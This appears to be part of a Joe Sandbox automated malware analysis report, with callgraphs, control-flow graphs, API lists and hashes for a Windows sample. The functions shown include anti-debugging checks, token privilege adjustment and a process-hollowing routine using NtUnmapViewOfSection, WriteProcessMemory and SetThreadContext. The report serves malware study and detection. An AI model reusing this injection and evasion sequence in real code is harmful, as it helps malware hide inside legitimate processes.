                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD538C4: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53945
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD538C4: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53958
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD538C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD5396D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD538C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53980
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD538C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53995
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD546E4: CreateFileW.KERNEL32 ref: 00007FF7DBD5472B
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD540E4: GetCurrentProcess.KERNEL32 ref: 00007FF7DBD5414B
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD540E4: OpenProcessToken.ADVAPI32 ref: 00007FF7DBD5415E
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD540E4: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7DBD54186
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD540E4: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7DBD541B1
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD540E4: CloseHandle.KERNEL32 ref: 00007FF7DBD541BC
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD540E4: OpenProcess.KERNEL32 ref: 00007FF7DBD541D1
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD540E4: CloseHandle.KERNEL32 ref: 00007FF7DBD54249
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 00007FF7DBD53037
                                                                                                                                                                                                                          • HeapFree.KERNEL32 ref: 00007FF7DBD5304A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcat$Process$CloseCreateFileHandleHeapOpenToken$AdjustAttributesCurrentDirectoryFolderFreeLookupPathPrivilegePrivilegesValue
                                                                                                                                                                                                                          • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                                                                          • API String ID: 3992431006-2286007224
                                                                                                                                                                                                                          • Opcode ID: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
                                                                                                                                                                                                                          • Instruction ID: ebf63646d321700af31b5c75232ddc04ada3984c431b44a20a07fa9acd7e69a0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2411C534A1CA8385E658FB58E8C43AEB7E0FB86704FE04136D55D46675DF3CA0598B60

                                                                                                                                                                                                                          Callgraph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          • Opacity -> Relevance
                                                                                                                                                                                                                          • Disassembly available
                                                                                                                                                                                                                          callgraph 0 Function_00007FF7A91BD33F 1 Function_00007FF7A91BDC46 2 Function_00007FF7A91B4544 3 Function_00007FF7A91B3744 89 Function_00007FF7A91B3714 3->89 4 Function_00007FF7A91BD339 5 Function_00007FF7A91BA052 6 Function_00007FF7A91B1050 7 Function_00007FF7A91BDC55 8 Function_00007FF7A91BCD54 9 Function_00007FF7A91B3B54 10 Function_00007FF7A91B2048 28 Function_00007FF7A91B1F88 10->28 61 Function_00007FF7A91B1FC8 10->61 93 Function_00007FF7A91B2008 10->93 11 Function_00007FF7A91BA04E 12 Function_00007FF7A91B3B24 13 Function_00007FF7A91B3C24 14 Function_00007FF7A91B3E24 15 Function_00007FF7A91BC91A 16 Function_00007FF7A91BD91D 17 Function_00007FF7A91B321C 18 Function_00007FF7A91BF232 19 Function_00007FF7A91BF281 20 Function_00007FF7A91BA27F 21 Function_00007FF7A91B3B84 22 Function_00007FF7A91BA778 23 Function_00007FF7A91BF278 24 Function_00007FF7A91B2978 25 Function_00007FF7A91B327C 54 Function_00007FF7A91B38C4 25->54 72 Function_00007FF7A91B44B4 25->72 26 Function_00007FF7A91BEF92 27 Function_00007FF7A91BA188 29 Function_00007FF7A91B2A88 29->24 30 Function_00007FF7A91B338C 30->10 31 Function_00007FF7A91BA061 32 Function_00007FF7A91BD361 33 Function_00007FF7A91BB15F 34 Function_00007FF7A91BCF65 35 Function_00007FF7A91BD365 36 Function_00007FF7A91B3C64 37 Function_00007FF7A91B4264 37->9 37->12 38 Function_00007FF7A91BA05A 39 Function_00007FF7A91BDE59 40 Function_00007FF7A91BA258 41 Function_00007FF7A91BC65C 42 Function_00007FF7A91B345C 42->17 42->25 42->37 46 Function_00007FF7A91B3A74 42->46 64 Function_00007FF7A91B10A0 42->64 65 Function_00007FF7A91B43A4 42->65 88 Function_00007FF7A91B3F14 42->88 96 Function_00007FF7A91B3CE4 42->96 108 Function_00007FF7A91B33EC 42->108 109 Function_00007FF7A91B32EC 42->109 43 Function_00007FF7A91BA772 44 Function_00007FF7A91BDE70 45 Function_00007FF7A91BA776 46->3 46->54 71 Function_00007FF7A91B39B4 46->71 47 Function_00007FF7A91B4674 48 Function_00007FF7A91BC673 49 Function_00007FF7A91B2E6C 50 Function_00007FF7A91B306C 50->49 51 Function_00007FF7A91BDCC2 52 Function_00007FF7A91BDEC1 53 Function_00007FF7A91BD0C4 54->3 55 Function_00007FF7A91B40C4 78 Function_00007FF7A91B4004 55->78 56 Function_00007FF7A91B45C4 56->2 57 Function_00007FF7A91BD8B8 58 Function_00007FF7A91B2CB8 58->29 59 Function_00007FF7A91BEBBE 60 Function_00007FF7A91BA2D0 62 Function_00007FF7A91B33CC 62->10 63 Function_00007FF7A91BC9CB 64->6 76 Function_00007FF7A91B1000 64->76 66 Function_00007FF7A91BE999 67 Function_00007FF7A91BE997 68 Function_00007FF7A91B359D 69 Function_00007FF7A91B2F9C 69->36 69->54 69->55 95 Function_00007FF7A91B46E4 69->95 97 Function_00007FF7A91B40E4 69->97 70 Function_00007FF7A91BE99B 79 Function_00007FF7A91B4404 72->79 73 Function_00007FF7A91BBEAD 74 Function_00007FF7A91B33AC 74->10 75 Function_00007FF7A91BC501 77 Function_00007FF7A91BD904 79->9 80 Function_00007FF7A91BABF9 81 Function_00007FF7A91BC2F9 82 Function_00007FF7A91BABF7 83 Function_00007FF7A91BC2F7 84 Function_00007FF7A91B36FC 85 Function_00007FF7A91BABFB 86 Function_00007FF7A91BD615 87 Function_00007FF7A91BD915 90 Function_00007FF7A91B3609 91 Function_00007FF7A91BB508 92 Function_00007FF7A91BE008 94 Function_00007FF7A91B2F0C 95->47 97->58 98 Function_00007FF7A91BB3DA 99 Function_00007FF7A91BEFD8 100 Function_00007FF7A91BA0DD 101 Function_00007FF7A91B1CDC 102 Function_00007FF7A91B30DC 102->13 102->14 102->21 102->56 102->71 103 Function_00007FF7A91BABF2 104 Function_00007FF7A91BBCF1 105 Function_00007FF7A91BC2F5 106 Function_00007FF7A91BB2F4 107 Function_00007FF7A91BE8F3 109->36 109->54 109->55 109->95 109->97 110 Function_00007FF7A91B31EC 110->50 111 Function_00007FF7A91B36EC

                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                          Function 00007FF7A91B345C Relevance: 47.4, APIs: 20, Strings: 7, Instructions: 143COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 231 7ff7a91b345c-7ff7a91b3472 call 7ff7a91b10a0 call 7ff7a91b321c 236 7ff7a91b3474-7ff7a91b3476 ExitProcess 231->236 237 7ff7a91b347c-7ff7a91b34aa call 7ff7a91b4264 call 7ff7a91b3ce4 call 7ff7a91b3f14 231->237 244 7ff7a91b34fb-7ff7a91b350e call 7ff7a91b3f14 237->244 245 7ff7a91b34ac-7ff7a91b34bd call 7ff7a91b43a4 237->245 252 7ff7a91b3510-7ff7a91b3521 call 7ff7a91b43a4 244->252 253 7ff7a91b354c-7ff7a91b355f call 7ff7a91b3f14 244->253 250 7ff7a91b34d2-7ff7a91b34d4 ExitProcess 245->250 251 7ff7a91b34bf-7ff7a91b34d0 call 7ff7a91b43a4 245->251 251->250 260 7ff7a91b34da call 7ff7a91b32ec 251->260 263 7ff7a91b3523-7ff7a91b3525 ExitProcess 252->263 264 7ff7a91b352b call 7ff7a91b327c 252->264 261 7ff7a91b3561-7ff7a91b3572 call 7ff7a91b43a4 253->261 262 7ff7a91b35a2-7ff7a91b35b8 call 7ff7a91b3a74 call 7ff7a91b33ec 253->262 271 7ff7a91b34df-7ff7a91b34e4 260->271 278 7ff7a91b3574-7ff7a91b3576 ExitProcess 261->278 279 7ff7a91b357c call 7ff7a91b327c 261->279 282 7ff7a91b35ba-7ff7a91b35cb call 7ff7a91b43a4 262->282 283 7ff7a91b360e-7ff7a91b36d0 CreateThread * 3 WaitForSingleObject * 3 ExitProcess 262->283 269 7ff7a91b3530-7ff7a91b3535 264->269 273 7ff7a91b3544-7ff7a91b3546 ExitProcess 269->273 274 7ff7a91b3537-7ff7a91b3542 Sleep 269->274 276 7ff7a91b34e6-7ff7a91b34f1 Sleep 271->276 277 7ff7a91b34f3-7ff7a91b34f5 ExitProcess 271->277 274->269 276->271 284 7ff7a91b3581-7ff7a91b3586 279->284 289 7ff7a91b35e0-7ff7a91b35e2 ExitProcess 282->289 290 7ff7a91b35cd-7ff7a91b35de call 7ff7a91b43a4 282->290 286 7ff7a91b3595-7ff7a91b3597 ExitProcess 284->286 287 7ff7a91b3588-7ff7a91b3593 Sleep 284->287 287->284 290->289 293 7ff7a91b35e8 call 7ff7a91b32ec 290->293 295 7ff7a91b35ed-7ff7a91b35f2 293->295 296 7ff7a91b3601-7ff7a91b3603 ExitProcess 295->296 297 7ff7a91b35f4-7ff7a91b35ff Sleep 295->297 297->295
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2162958449.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163050514.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163081704.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163110058.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163137865.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                                          • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                                                                          • API String ID: 613740775-1953711635
                                                                                                                                                                                                                          • Opcode ID: 31553c019a40e59f8029305eb783abe107710fc58d50c27d998bbdd7f76d6dd3
                                                                                                                                                                                                                          • Instruction ID: 0b4550e609804ef1ace19be7832b13da796b37b85031e74260f08a93080f3134
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31553c019a40e59f8029305eb783abe107710fc58d50c27d998bbdd7f76d6dd3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C61FC20A1FA5391EA66BF31F85527AA2B2EF84740FC64135E44EC65F5CE2DE5368230
                                                                                                                                                                                                                          Function 00007FF7A91B4264 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2162958449.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163050514.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163081704.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163110058.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163137865.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 434396405-0
                                                                                                                                                                                                                          • Opcode ID: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                                                                          • Instruction ID: a1c2eca8567d78a82139ea56b01fe9258f5495b3706dbf2a7889c24ecce09da9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF31F23261AA8186E751AF15F45062EF7B1FBC8780F515135FA8A83BB8DF3CD4518B10
                                                                                                                                                                                                                          Function 00007FF7A91B321C Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2162958449.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163050514.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163081704.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163110058.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163137865.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3920101602-0
                                                                                                                                                                                                                          • Opcode ID: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                                                                          • Instruction ID: 8994e95279a1ed2ccac00062e453188f2513c28bc1deeb091bb1e7f6f6d24472
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7F03010A0F24281E6326F55F40436DA7F1EF45B44F8101B4E58D855B4CF2CD636DB21
                                                                                                                                                                                                                          Function 00007FF7A91B43A4 Relevance: 4.5, APIs: 3, Instructions: 21synchronizationCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2162958449.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163050514.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163081704.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163110058.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163137865.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateErrorHandleLastMutex
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4294037311-0
                                                                                                                                                                                                                          • Opcode ID: 7b7f23db395eba8d18a11b8c6077d8c5ef125244b6b8ccbe54b8300fae36e676
                                                                                                                                                                                                                          • Instruction ID: 0a7064d09bd3fc69b52496ff9b647eef24976861ffdad95a9ddd74a9f95120c8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b7f23db395eba8d18a11b8c6077d8c5ef125244b6b8ccbe54b8300fae36e676
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15F03025B0E651D2EA216F20F44537DA3B1FB95700F954435D98EC2AB4CF2DD9299620
                                                                                                                                                                                                                          Function 00007FF7A91B1050 Relevance: 3.0, APIs: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 328 7ff7a91b1050-7ff7a91b108c LoadLibraryA GetProcAddress
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2162958449.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163050514.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163081704.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163110058.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163137865.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2574300362-0
                                                                                                                                                                                                                          • Opcode ID: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                                          • Instruction ID: 9edf9f7fbe465b6f84d3465e37a1411f2084efac07466daff958b158677f4252
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23E09276509F8086CA20AF15F84001AB7B4FBC9794F904225EACD82B38DF3CC165CB00
                                                                                                                                                                                                                          Function 00007FF7A91B3B24 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 329 7ff7a91b3b24-7ff7a91b3b33 330 7ff7a91b3b35-7ff7a91b3b42 VirtualFree 329->330 331 7ff7a91b3b48-7ff7a91b3b4c 329->331 330->331
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2162958449.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163050514.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163081704.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163110058.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163137865.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                          • Opcode ID: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
                                                                                                                                                                                                                          • Instruction ID: 74a2e36950f8e299ce9892203c61c3ebca8bfa78e19ac58bbe518265a6878e57
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7D01311E3594181E755AF16F445715D3B1FBC4744FC08035E58981574CF3CD0B58F10

                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                          Function 00007FF7A91B2048 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 440COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 332 7ff7a91b2048-7ff7a91b20c2 GetModuleFileNameW 333 7ff7a91b20c4 332->333 334 7ff7a91b20c9-7ff7a91b2105 332->334 335 7ff7a91b296d-7ff7a91b2975 333->335 336 7ff7a91b2107-7ff7a91b210f 334->336 337 7ff7a91b211d-7ff7a91b2139 call 7ff7a91b1f88 334->337 338 7ff7a91b2111-7ff7a91b2119 336->338 339 7ff7a91b213b-7ff7a91b2157 call 7ff7a91b1fc8 336->339 346 7ff7a91b217c-7ff7a91b2186 337->346 341 7ff7a91b2159-7ff7a91b2175 call 7ff7a91b2008 338->341 342 7ff7a91b211b-7ff7a91b2177 338->342 339->346 341->346 342->335 350 7ff7a91b2188 346->350 351 7ff7a91b218d-7ff7a91b21e1 CreateProcessW 346->351 350->335 352 7ff7a91b21e3 351->352 353 7ff7a91b21e8-7ff7a91b2228 CreateFileW 351->353 352->335 354 7ff7a91b222f-7ff7a91b224b GetFileSize 353->354 355 7ff7a91b222a 353->355 356 7ff7a91b2257-7ff7a91b2262 CloseHandle 354->356 357 7ff7a91b224d-7ff7a91b2255 354->357 355->335 356->335 357->356 358 7ff7a91b2267-7ff7a91b228f VirtualAlloc 357->358 359 7ff7a91b22a1-7ff7a91b22cc ReadFile 358->359 360 7ff7a91b2291-7ff7a91b229c CloseHandle 358->360 361 7ff7a91b22f1-7ff7a91b233f CloseHandle GetThreadContext 359->361 362 7ff7a91b22ce-7ff7a91b22ec VirtualFree CloseHandle 359->362 360->335 363 7ff7a91b2341-7ff7a91b2354 VirtualFree 361->363 364 7ff7a91b2359-7ff7a91b23de ReadProcessMemory GetModuleHandleA GetProcAddress 361->364 362->335 363->335 366 7ff7a91b23e0-7ff7a91b23f3 VirtualFree 364->366 367 7ff7a91b23f8-7ff7a91b2461 VirtualAllocEx 364->367 366->335 368 7ff7a91b2463-7ff7a91b2476 VirtualFree 367->368 369 7ff7a91b247b-7ff7a91b24af WriteProcessMemory 367->369 368->335 370 7ff7a91b24b1-7ff7a91b24c4 VirtualFree 369->370 371 7ff7a91b24c9-7ff7a91b24d4 369->371 370->335 372 7ff7a91b24e6-7ff7a91b24f9 371->372 373 7ff7a91b24ff-7ff7a91b2588 WriteProcessMemory 372->373 374 7ff7a91b25a7-7ff7a91b25ee 372->374 375 7ff7a91b25a2 373->375 376 7ff7a91b258a-7ff7a91b259d VirtualFree 373->376 377 7ff7a91b2600-7ff7a91b2613 374->377 375->372 376->335 379 7ff7a91b2619-7ff7a91b2668 RtlCompareMemory 377->379 380 7ff7a91b2898-7ff7a91b291c WriteProcessMemory SetThreadContext 377->380 381 7ff7a91b266a 379->381 382 7ff7a91b266c-7ff7a91b2695 379->382 383 7ff7a91b2933-7ff7a91b2943 ResumeThread 380->383 384 7ff7a91b291e-7ff7a91b2931 VirtualFree 380->384 381->377 386 7ff7a91b26a0-7ff7a91b26ae 382->386 387 7ff7a91b2945-7ff7a91b2958 VirtualFree 383->387 388 7ff7a91b295a-7ff7a91b2967 VirtualFree 383->388 384->335 389 7ff7a91b2893 386->389 390 7ff7a91b26b4-7ff7a91b273f 386->390 387->335 388->335 389->380 391 7ff7a91b2751-7ff7a91b275f 390->391 392 7ff7a91b2765-7ff7a91b2798 391->392 393 7ff7a91b288e 391->393 394 7ff7a91b279a 392->394 395 7ff7a91b279c-7ff7a91b286f ReadProcessMemory WriteProcessMemory 392->395 393->386 394->391 397 7ff7a91b2871-7ff7a91b2884 VirtualFree 395->397 398 7ff7a91b2889 395->398 397->335 398->393
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2162958449.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163050514.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163081704.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163110058.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163137865.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileModuleName
                                                                                                                                                                                                                          • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                                          • API String ID: 514040917-3001742581
